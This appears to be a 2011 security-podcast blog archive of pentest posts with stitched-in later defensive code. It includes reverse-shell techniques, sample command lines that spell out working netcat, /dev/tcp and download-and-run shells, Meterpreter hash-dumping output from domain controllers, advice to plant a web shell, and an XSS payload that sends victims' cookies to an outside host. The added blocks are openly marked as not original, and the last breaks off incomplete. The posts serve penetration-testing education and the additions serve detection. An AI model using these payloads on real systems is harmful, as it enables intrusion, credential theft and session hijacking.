May 2011 Archives

Sorry for the late release... holiday and all. Here it is: Episode 245 part 1 with our interview with A.P. Delchi as he tells us his epic tales from the world of security. Sit back and enjoy.

Episode 245 Show Notes

Episode 245 part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian, Carlos Perez, Larry Pesce

Audio Feeds:

Here is another gem from LaNMaSteR53 as originally posted here.

There are many distributions of Linux, and they all do things a little differently regarding default security and built-in tool sets. This means that when engaging these different flavors during a pentest, what works against one Linux target to get an interactive shell may not work against another. Well, not to worry my friends, there are many techniques for spawning shells, specifically reverse shells, from Linux, and one or more of these techniques is bound to be available no matter which distro you're looking at.

The scenario is this: you have the ability to run a simple command, or cause a user to run a simple command, on the target system, whether it be via a Remote Command Execution vulnerability in a website or some sort of PHP-injected XSS which causes a privileged user to run commands on the target system. There are many instances of this scenario. Starting from the easiest and most common, here are some of the techniques which can be used to gain a reverse shell on the target system.

#1. netcat:
Surprise!!! Nothing new here. Plain and simple. Fire up a listener on the attacker machine on a port which is reachable from the target and connect back to the listener with netcat. Looks like this.

...just kidding...

#2. netcat with GAPING_SECURITY_HOLE disabled:
This is a little trick that Ed Skoudis tweeted about in November of last year, but I haven't seen it widely publicized. It is based on the common technique used to build netcat relays. When the GAPING_SECURITY_HOLE is disabled, which means you don't have access to the '-e' option of netcat, most people pass on using netcat and move to something else. Well this just isn't necessary. Create a FIFO file system object and use it as a backpipe to relay standard output from commands piped from netcat to /bin/bash back into netcat. Sounds confusing right? The following image should clear things up.

#3. netcat without netcat:
I love "hacks" that use features of the operating system against itself. This is one of those "hacks". It takes the /dev/tcp socket programming feature and uses it to redirect /bin/bash to a remote system. It's not always available, but can be quite handy when it is.

#4. netcat without netcat or /dev/tcp:
/dev/tcp not available either? Just use telnet with technique #2.

#5. telnet-to-telnet:
I'm not sure why you'd use this technique, but it's an option, so here it is nonetheless. This is clearly the ugliest of the techniques. It uses two telnet sessions connected to remote listeners to pipe input from one telnet session to /bin/bash, and pipe the output to the second telnet session. Commands are entered into one of the attacker's listeners and feedback is received on the other.

#6. RCE shell:
On this one I'm cheating a little bit. This applies to Remote Command Execution vulnerabilities only. Rather than manually entering commands into a proxy or browser URL, I wrote a small Python script which gives you the feel of a shell, without spawning anything in reverse from the target. You merely pass the script the vulnerable URL with the injectable field replaced with the '<rce>' tag and it presents you with a clean interface for entering commands. In the background, the script is making the request to the web server, parsing the response, and presenting it to you.

#7. PHP reverse shell via interactive console:
The last technique makes use of the php interactive console. The attacker issues one command which moves to the /tmp directory (because it is typically world writable), uses wget to download a malicious php reverse_tcp backdoor (which the attacker hosts on a web server that he controls), and executes the backdoor via the interactive console.

I want to end this post by stating that I am not the originator of techniques #1, 2, 3, 5, or 7. The majority of these techniques were learned in Ed Skoudis' amazing Security 504 and 560 classes available through SANS. Technique #4 is something I've never seen but stumbled across as I was conducting the demos for this post, so I'll take credit. Obviously, anyone can do #6, and there are plugins for various automated web app testing software packages that do, but I built my script from the ground up and tailored it to preference. If you know of any additional methods that may be helpful to the pentesting community, please leave them in the comments below. Without sharing, we all fail. Thanks, and enjoy!
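Because every one of the techniques above leaves its fingerprint in the command line that gets executed, the same list reads as a detection checklist. The following is an added example, not part of the original post or of any tool it mentions: a small rule set that scans recorded command lines (auditd execve records, shell history, EDR process telemetry reduced to the command string) for the artefact each technique leaves, run over a handful of constructed sample lines in which the RFC 5737 documentation address 203.0.113.5 stands in for the listener host.

```python
import re

# Each rule names the technique from the post it covers and matches the
# artefact that technique leaves in a recorded command line.
RULES = [
    # #1: netcat built with GAPING_SECURITY_HOLE, "-e /bin/sh" style
    ("netcat -e", re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-e\s+/bin/(ba)?sh\b")),
    # #2 and #4: a FIFO backpipe wired to netcat or telnet on the same line
    ("fifo backpipe", re.compile(r"\bmk(fifo|nod)\b.*\b(nc|ncat|netcat|telnet)\b")),
    # #3: bash's /dev/tcp (or /dev/udp) pseudo-device used as a socket
    ("/dev/tcp redirect", re.compile(r"/dev/(tcp|udp)/")),
    # #5: telnet output piped straight into a shell
    ("telnet pipe to shell", re.compile(r"\btelnet\b[^|]*\|\s*(/bin/)?(ba)?sh\b")),
    # #7: a download followed by the php interactive console in one command
    ("download then php -a", re.compile(r"\b(wget|curl)\b.*\bphp\b\s+-a\b")),
]

# Constructed sample telemetry (not real captures).  203.0.113.5 is an address
# from the RFC 5737 documentation range, standing in for the listener host.
SAMPLE_CMDLINES = [
    "nc -zv db.internal 5432",                                              # benign: port check
    "nc -e /bin/bash 203.0.113.5 4444",                                     # technique #1
    "mkfifo /tmp/bp; nc 203.0.113.5 4444 0</tmp/bp | /bin/bash 1>/tmp/bp",  # technique #2
    "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",                            # technique #3
    "telnet 203.0.113.5 4444 | /bin/bash | telnet 203.0.113.5 4445",        # technique #5
    "cd /tmp && wget http://203.0.113.5/r.txt -O r.php && php -a",          # technique #7
    "php -a",                                                               # benign: developer REPL
    "curl -s http://repo.internal/pkg.tar.gz | tar xz",                     # benign: package fetch
]


def match_rules(cmdline):
    """Names of every rule that fires on one command line, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return (cmdline, [rule names]) for each line that fires at least one rule."""
    hits = []
    for line in cmdlines:
        names = match_rules(line)
        if names:
            hits.append((line, names))
    return hits


if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(names):22}  {line}")
```

The rules are deliberately per-line: if the FIFO is created in one command and netcat is started in the next, the "fifo backpipe" rule needs session-level correlation that this example does not do. The bare `php -a` line shows the tuning the last rule applies, since a developer at a REPL should not page anyone; only a download immediately followed by the console is flagged.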

PaulDotCom will be teaching Offensive Countermeasures at Black Hat July 30-31

Do you like stories? How about the old fashioned yarns of yore where the snide get their comeuppance?

We at PaulDotCom love tales, so tonight A. P. Delchi dials in to tell us his epic tale of comeuppance as only those who have managed computers and security for *much* smarter folks can comprehend. Then, stick around for the jack of all trades and master of more than ordinary men can aspire to, Moxie Marlinspike. Moxie will give us an overview of all the sweet encrypted goodness going on at Whisper Systems, and maybe even share a story or two from his sailing days.

Therefore, we encourage you to put a video on for the kids, pour yourself your brand of muscle relaxant, and enjoy Episode 245 of PaulDotCom Security Weekly as it was intended - live, via the link below:

NOTE: The video will play the most recent show up until we are live!

[Image: If only the server room walls could talk...]

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 245 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Bank of America Breach



Please take a moment and read the following article on the current Bank of America breach:

And this..

There are two main points we need to take from this. First, the insider threat is real. It is also incredibly hard to detect and react to. We have been pushing for quite some time at PDC to move beyond simple IDS/IPS/AV tactics. This story only serves to reinforce this view.

The second thing we need to ponder is the fact that it took a year to notify the customers of the breach. Oh... and 10 million being stolen.

I hope that the upper management pool around the world is starting to realize that security is not a check-box exercise. It is not a matter of "yep, we have security." And, it is not a bunch of kids in the basement looking for computers to "p0wn." The threats are real, the money they can steal is real. There is not a "product" you can purchase that will protect you.


Siemens Cone of Silence


This past week at Takedowncon in Dallas (I just happened to be "there"), Dillon Beresford elected to pull his talk on cascading SCADA vulnerabilities, after some conversations with Siemens (the SCADA manufacturer with the vulnerabilities indicated in this talk) and DHS, who apparently indicated to him the seriousness of the issue. I sense all sorts of conspiracy here, even though I was literally standing next to Dillon discussing the mess with Jayson Street. I find it commendable that Dillon elected to pull the talk himself, but is that the REAL story? Did Dillon really not understand the gravity of the situation?

Further, does this actually work? Think of it like this: he did not do the research in a vacuum, I am sure he had co-workers and others helping. Also, he was communicating with the vendor and DHS. So let’s assume there were more than 10 people who knew about the research. This is being very generous because any government bureaucracy will have a crap-ton of people in a number of meetings to make any decisions. The point I am trying to make is this: the reason to suppress this talk was most likely not to stop the information from getting "out-there" because it already was. The people who would be interested in this research most likely have the means and capabilities to get it.

No, I fear the real reason for suppressing this talk was to cover the "sterling" reputation of the vendor and DHS. And that is a frightening prospect. I do understand that these SCADA attacks can be dangerous. But in reality, any vulnerability leveraged in the right way can be dangerous.

[Image: Tin Foil Hat Guy, please show us the way...]

But I am glad Dillon made the call. It was his to make. Maybe we need a vulnerability disclosure panel or webcast on PaulDotCom in the near future.


This post brought to you by the Illuminati, Larry, and John.


It came from the blog: the recap. Then weekly security news, the only way we know how to do it. Listen in as John Strand schools us on a SpongeBob SquarePants vulnerability that allows code execution.

Episode 244 Show Notes

Episode 244 part 2 Direct Audio Download


Please take a moment and read the following article:

Six rising threats from cybercriminals.

"PCs are now fairly well protected", he says, so some hackers have moved on to mobile devices. - Really, what networks have you been looking at? No doubt it can be profitable to attack mobile phones, but let’s not lose sight of the ill-protected PCs, which are more powerful and ubiquitous enough to attack and make money from. "Smart Grid" - Sure, attackers are after the "Smart Grid," but let’s look at motivations. Theft of service and service disruption are the primary attack vectors, and this doesn't translate into profits as well as a credit card or bank account. I believe that if someone can find a way to generate (pun intended) money off the smart grid, not save money or bribe people for power (which is unlikely to be a good stream of revenue), this will not be widespread.

[Image: Yes, there has to be money in it for criminals to be interested. Crack ain't cheap.]


Social Networking - In a typical exploit, says Joffe, someone contacts you on a service like Facebook or LinkedIn, posing as a friend of a friend or a co-worker of someone you trust. - Yes, this will be common, and yes, it will be used by attackers to steal information, as long as we go on trusting social networks and using them to store our information. "Cyberstalking" - If you are a victim, you should learn about offensive countermeasures and plant traps for those stalking you. Who is stalking me? I know who they are; just look at my Metasploit console.

Further, I think we need to look at exactly what is meant by systems being fairly well protected. When it comes to remote exploits (or server-side exploits), sure, things are far better in the world of Windows today. But here is the trick: attackers do not "need" to use remote exploits as much as they once did. It is far easier to get a target to run a malicious application than to find a remote exploit. Hence, malware creation and privilege escalation should be a focus of concern for any pentesting group.

[Image: This app looks totally legit.]

The point is this: the world is moving on. Follow the money and follow the tactics of the bad guys. Bad guys have been bypassing AV with their malware for quite some time. You need to learn how to do that too. Bad guys have been focusing on Privilege Escalation attacks. You need to do that too.

No, systems are not fairly well protected. The attacks have moved on. You should too.


Cesar Cerrudo is this week's interview, concerning bypassing Windows protection mechanisms.


Episode 244 Show Notes

Episode 244 part 1 Direct Audio Download


Date and time change this week for our live recording - the fun shifts to Friday at 8PM EDT, but rest assured that there will be the same awesome technical content with the help of Cesar Cerrudo, CTO of IOActive, who will be giving us a brief overview of his recent presentation on Bypassing Windows Services Protections.

So pour yourself a beer, give the Intern control of your remote, and be sure not to miss Episode 244 Friday night!

You can follow along and watch the show live via the link below:

NOTE: The video will play the most recent show up until we are live!


For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, tune into PaulDotCom Radio for an audio only version of the show, or if you prefer, visit the Episode 244 show notes page.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

A couple of months ago I was asked by the NWN guys from the pentest team to help them automate dumping Windows hashes depending on the role and privilege level; for them I wrote hashdump2, a Meterpreter script to automate what was required back then. Mubix this week wrote a blog post on his experience and process for dumping hashes on x64 systems, especially Windows 2008 R2 Domain Controllers. I re-wrote the hashdump2 script, added the logic that Mubix came up with plus the ability to escalate privileges using the getsystem API call, reworked the logic of the script, and ported the result to a post module, both called smart_hashdump. The way the module and script work is as follows:

  • It first checks the privilege level and OS.
  • It checks whether the target is a Domain Controller.
  • Based on this information it prefers reading the registry to get the hashes if possible; if that is not possible, it injects into the lsass process if possible. For Domain Controllers it uses injection into lsass.
  • If the target is a Windows 2008 server and the process is running with admin privileges, it attempts to get SYSTEM privilege using getsystem. Even after it gets SYSTEM privilege, due to the way the token privileges are set it still cannot inject into the lsass process, so the code migrates to a process already running as SYSTEM and then injects into the lsass process.
  • If the code detects that it is running on a Windows 7/Vista box with UAC disabled and it is running as local admin, it runs getsystem and uses the read-registry method.
  • On Windows 2003/2000/XP it runs getsystem and, if successful, uses the read-registry method.

Script:

meterpreter > run smart_hashdump -h
Meterpreter Script for automating the dumping of local accounts from
the SAM Database and if the targets host is a Domain Controller the
Domain Account Database using the proper technique depending on 
privilage level, OS and Role of host.
OPTIONS:
    -h        Help menu.
    -l <opt>  Log folder to save results, if none provided default log path will be used.
    -s <opt>  Try to get SYSTEM Privilege

Module:

msf exploit(handler) > use post/windows/gather/smart_hashdump 
msf post(smart_hashdump) > info
       Name: Windows Gather Local and Domain Controler Account Password Hashes
     Module: post/windows/gather/smart_hashdump
    Version: $Revision$
   Platform: Windows
       Arch: 
       Rank: Normal
Provided by:
  Carlos Perez <carlos_perez@darkoperator.com>
Description:
  This will dump local accounts from the SAM Database and if the 
  targets host is a Domain Controller the Domain Account Database 
  using the proper technique depending on privilage level, OS and Role 
  of host.
msf post(smart_hashdump) > show options 
Module options (post/windows/gather/smart_hashdump):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   GETSYSTEM  false            no        Attempt to get SYSTEM Privilege on the target host.
   SESSION                     yes       The session to run this module on.

Both use the same calls and print almost the same messages, so let's use the post module since it is what most of the code is moving to. First, let's run it on a Windows 2008 R2 DC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN2K8R2-01
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518200416_default_192.168.1.234_windows.hashes_483699.txt
[+]     This host is a Domain Controller!
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*] Migrating to process owned by SYSTEM
[*] Migrating to wininit.exe
[+] Successfully migrated to wininit.exe
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552:::
[+]     krbtgtB:502:aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2:::
[+]     testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::


On a Windows 7 System with UAC Disabled as Administrator:


meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201100_default_192.168.1.224_windows.hashes_711181.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN701
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201122_default_192.168.1.224_windows.hashes_541308.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 35f17065cf29faf142844a684d502ba8...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::


on a Windows 7 System as Administrator with UAC:

meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against WIN-KVJG16GEMOJ
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201439_default_192.168.1.112_windows.hashes_452083.txt
[-] Insufficient privileges to dump hashes!

Sadly, UAC does a good job of blocking hash dumping even as Administrator; it will even block getsystem.


on a Windows XP System:

meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201750_default_192.168.1.113_windows.hashes_761609.txt
[*] Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
meterpreter > run post/windows/gather/smart_hashdump GETSYSTEM=true
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the Database if one is connected.
[*] Hashes will be saved in loot in John Password File format to:
[*] /Users/carlos/.msf3/loot/20110518201818_default_192.168.1.113_windows.hashes_177417.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM Privilege
[+] Got SYSTEM Privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

On XP and Windows 2003 if you are an administrator you can dump hashes with no problem and getsystem will yield success.

To get a list of all the accounts and hashes from the main console:

msf exploit(handler) > db_creds 
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=WIN2K8R2-01$? pass=aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=testuser  pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=krbtgtB pass=aad3b435b51404eeaad3b435b51404ee:a6c94aa1141fd563d618b5f1dd0d86c2 active=true
[*] Time: 2011-05-18 02:02:08 UTC Credential: host=192.168.1.234 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:d208bd92b52f7cb48eb64c53dbd34552 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=adminuser pass=aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:03:40 UTC Credential: host=192.168.1.224 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=HelpAssistant pass=17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=Administrator pass=bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203 active=true
[*] Time: 2011-05-18 02:06:15 UTC Credential: host=192.168.1.113 port=445 proto=tcp sname=smb type=smb_hash user=SUPPORT_388945a0 pass=aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63 active=true
[*] Found 9 credentials

If you are going to use those hashes in PSEXEC and for cracking, remember to filter out the Guest, SUPPORT_* and HelpAssistant accounts since typically they are disabled. On the Domain Controller the account with the hostname$ is the Active Directory Recovery Account, many times the same as the Domain Admin account, and it cannot be used remotely.
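Since the loot file is in the pwdump/John format shown above, it can also be read by a script. The following added example (my code, not part of smart_hashdump or Metasploit) parses that format and triages the accounts the way the paragraph above suggests, then goes a step further and reports what the hashes say about password hygiene: a blank password, an LM hash still being stored, and the same password shared between accounts. It uses the hash lines printed above as sample input; stripping the stray '"' and '?' characters visible in that output assumes they are rendering artefacts rather than part of the account names.

```python
import re
from collections import defaultdict

# LM and NT hashes of the empty string.  An LM field equal to EMPTY_LM means no
# LM hash is stored (the post-XP default); an NT field equal to EMPTY_NT means
# the account has a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Accounts the post says are typically disabled and should be filtered out.
DEFAULT_DISABLED = {"guest", "helpassistant"}

# Optional "[+]" prefix as printed by the module, then the four pwdump fields.
LINE_RX = re.compile(
    r"^\s*(?:\[\+\]\s*)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::\s*$",
    re.IGNORECASE,
)


def parse_pwdump(text):
    """One dict per hash line; other output lines ([*] progress etc.) are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RX.match(line)
        if not m:
            continue
        # Assumption: the '"' and '?' glued to some names in the module output
        # (SUPPORT_388945a0", WIN2K8R2-01$?) are rendering artefacts, so drop them.
        user = m["user"].strip().strip('"?')
        entries.append({"user": user, "rid": int(m["rid"]),
                        "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return entries


def classify(entry):
    """Tags describing what the line tells an auditor about this account."""
    tags = []
    u = entry["user"].lower()
    if u.endswith("$"):
        tags.append("machine-account")      # the hostname$ entry on a DC
    if u in DEFAULT_DISABLED or u.startswith("support_"):
        tags.append("default-disabled")     # usually disabled, per the post
    if u.startswith("krbtgt"):
        tags.append("krbtgt")
    if entry["rid"] == 500:
        tags.append("builtin-admin")
    if entry["nt"] == EMPTY_NT:
        tags.append("blank-password")
    if entry["lm"] != EMPTY_LM:
        tags.append("lm-hash-present")      # LM storage still enabled: weak and crackable
    return tags


def shared_passwords(entries):
    """NT hashes are unsalted, so identical NT values mean identical passwords."""
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].append(e["user"])
    return {nt: users for nt, users in by_nt.items() if len(users) > 1}


def audit(text):
    """Return ({user: [tags]}, {nt_hash: [users sharing it]}) for a loot file."""
    entries = parse_pwdump(text)
    return {e["user"]: classify(e) for e in entries}, shared_passwords(entries)


# Sample input taken from the module output shown above (the hash values are
# the ones printed there); the "[*]" line is included to show it is ignored.
SAMPLE_LOOT = """\
[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0":1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::
[+]     WIN2K8R2-01$?:1006:aad3b435b51404eeaad3b435b51404ee:5780b9a9d5b3fc7792982ae4b7b44b8f:::
[+]     testuser:1109:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     adminuser:1000:aad3b435b51404eeaad3b435b51404ee:7a118f7a2f2b34d61fa19b840b4f5203:::
[*] Dumping password hashes...
"""

if __name__ == "__main__":
    tags, shared = audit(SAMPLE_LOOT)
    for user, t in tags.items():
        print(f"{user:20} {', '.join(t) or '-'}")
    for nt, users in shared.items():
        print(f"same password ({nt[:8]}...): {', '.join(users)}")
```

On the sample above the Administrator entry from the Windows 7 box is the one worth acting on: its NT field is the hash of the empty string, so the built-in administrator has no password, while HelpAssistant from the XP box still carries an LM hash. testuser and adminuser share an NT hash, which is the same password set on two accounts.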

I included the creation of a loot file with the hashes for two reasons:

  1. It saves the SID of the account so as to identify the accounts and be able to use those if needed.
  2. Sometimes you do not have a database attached, or you delete a workspace by accident.


Script Download

Module Download

There have been a number of people coming to me and asking what tool to use for testing web applications. The answer is easy. The tool is Burp Pro.

However, I think many people are missing the point. When dealing with a web application, the true vulnerabilities are not the ones that are identified when scanning an application with a tool. Sure, there are tools that will help you find things like XSS or SQLi, but what about some of the harder-to-spot vulnerabilities? Things like XSRF and logic errors are not easily identified with a tool but can be devastating when attacked.

So what I want to offer today is a sort of quick view of how to approach a web application when looking for those hard to find vulnerabilities.

First, let’s identify some tools to assist with testing for XSRF. Notice, I did not say tools that will test for XSRF.

http://hexsec.com/misc/monkeyfist

http://code.google.com/p/pinata-csrf-tool/

http://www.youtube.com/watch?v=EmmNn1FRYm4

I said these tools assist with testing for XSRF because it will require you to do a bit of research into the business logic flow of an application.

Speaking of business logic flow, it is also important to map out how an application is put together. Look at the different input fields through the lens of Burp. See where different fields (input and output) exist. When you have identified these different fields, start tampering with them and seeing how the application reacts.

I want to share a presentation with you that clearly identifies how to do a great web application assessment.

Go and spend some time looking over the presentation. See how little of it was related to XSS and SQLi? This is what we mean by testing business logic.

Another great business logic test is to see how the site reacts to different user agent strings. A great tool for this is ua-tester from Chris John Riley.

I also wanted to share something that many people know about, but many more do not. I am shocked at how many of my students do not know about Laudanum. If you have the ability to upload scripts, you need to upload Laudanum. You upload the correct script (i.e. shell.asp for ASP servers, .php for PHP servers, etc.) and then you browse to the file you have uploaded. If everything went correctly (and it will most of the time) you will have a shell on the server.

Finally, try forced browsing. What you do is list out all of the pages that are available to an administrative user (i.e. user management pages) then log in as a standard user, then try to view the admin pages by force browsing to them. For many sites the only security they have keeping general users from these pages is the fact that the links to them have been removed.

Is this everything you need to know? Not even close. I just hope it gets you going down the right direction. Tools are great, but we are Penetration Testers. We need to do more.

Plus, simply running tools is boring....


[Image: You only found Cross Site Scripting?]


Here is another great post from LanMaSteR 53.


Everyone knows what XSS is, right? Good, I'll spare you the definition. A common use for XSS is stealing cookies to hijack sessions and gain access to restricted web content. Cookie stealing is typically done by forcing a target's browser to issue some sort of GET request to a server controlled by the attacker, which accepts the target's cookie as a parameter and processes it in some way. In most cases, when a cookie stealing XSS attack is successful, it generates a visual clue which can tip off the target. While it is too late at this point, stealth has been compromised, and that could be the difference between the user keeping the session active or clicking 'log out' and rendering your stolen cookie invalid.





[Image: Good ole' fashion cookie stealin']


About a year ago, I came up with a stealth technique for executing cookie stealing XSS attacks that I assumed was common knowledge. But after talking about the technique with several top web app security professionals, I realized that the technique may be more unique than I initially thought. Below is an example of the technique.


javascript:img=new Image();img.src="http://tools.lanmaster53.com/monster.php?cookie="+document.cookie;


For those that don't understand exactly what is going on here, basically, I'm using a dummy JavaScript image to launch a GET request. The first part of the script instantiates an image object, and the second part sets the source attribute of the image object. In this example, the source url is what you would use in any other cookie stealing attack. The key here is that once the source attribute is set, the browser fires off the request and stores the response in memory. I never use the instantiated image, the browser doesn't care, and the user is unaware that anything has happened. Stealth is maintained.


So you see, this is very sneaky and full of potential. Here, I use this technique in creating a web based keystroke logger.
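From the defender's side, the interesting property of this trick is that it needs two things to work: document.cookie has to be readable from script, and the browser has to be willing to fetch an image from the attacker's host. The following added example (not code from the original post) checks both on a server's own response headers: it audits a Set-Cookie header for the HttpOnly, Secure and SameSite attributes, and evaluates whether a Content-Security-Policy img-src directive would allow an image request to the URL used in the example above. The sample headers are constructed; the CSP evaluator covers 'self', 'none', '*', scheme sources, host sources and *.host wildcards and assumes no nonce or hash sources.

```python
from urllib.parse import urlparse


def parse_set_cookie(header):
    """Split a Set-Cookie header value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True   # flag attrs -> True
    return name.strip(), value, attrs


def audit_set_cookie(header):
    """Return (cookie name, list of weaknesses) for one Set-Cookie header."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("no-httponly")      # readable via document.cookie, the vector above
    if "secure" not in attrs:
        findings.append("no-secure")        # also sent over plain HTTP
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() == "none":
        findings.append("samesite-missing-or-none")
    return name, findings


def csp_allows_image(csp, image_url, page_origin):
    """Would this policy let a page at page_origin load image_url?
    Handles 'self', 'none', '*', scheme sources (https:), host sources and
    *.host wildcards.  Assumption: no nonce or hash sources are in use."""
    directives = {}
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("img-src", directives.get("default-src"))
    if sources is None:
        return True                         # nothing restricts image loads
    target, page = urlparse(image_url), urlparse(page_origin)
    for src in sources:
        s = src.lower()
        if s == "'none'":
            return False
        if s == "*":
            return True
        if s == "'self'":
            if (target.scheme, target.hostname, target.port) == (page.scheme, page.hostname, page.port):
                return True
            continue
        if s.endswith(":"):                 # scheme source such as https:
            if target.scheme == s[:-1]:
                return True
            continue
        host = s.split("://", 1)[-1].split("/", 1)[0]   # keep host[:port] only
        if host.startswith("*.") and target.hostname and target.hostname.endswith(host[1:]):
            return True
        if host in (target.hostname, f"{target.hostname}:{target.port}"):
            return True
    return False


# Constructed sample headers (not captured from a real site).
SAMPLE_COOKIES = [
    "PHPSESSID=abc123; Path=/",
    "PHPSESSID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
]
SAMPLE_CSP = "default-src 'self'; img-src 'self' cdn.example.com"
# The collection URL from the post, with a constructed cookie value appended.
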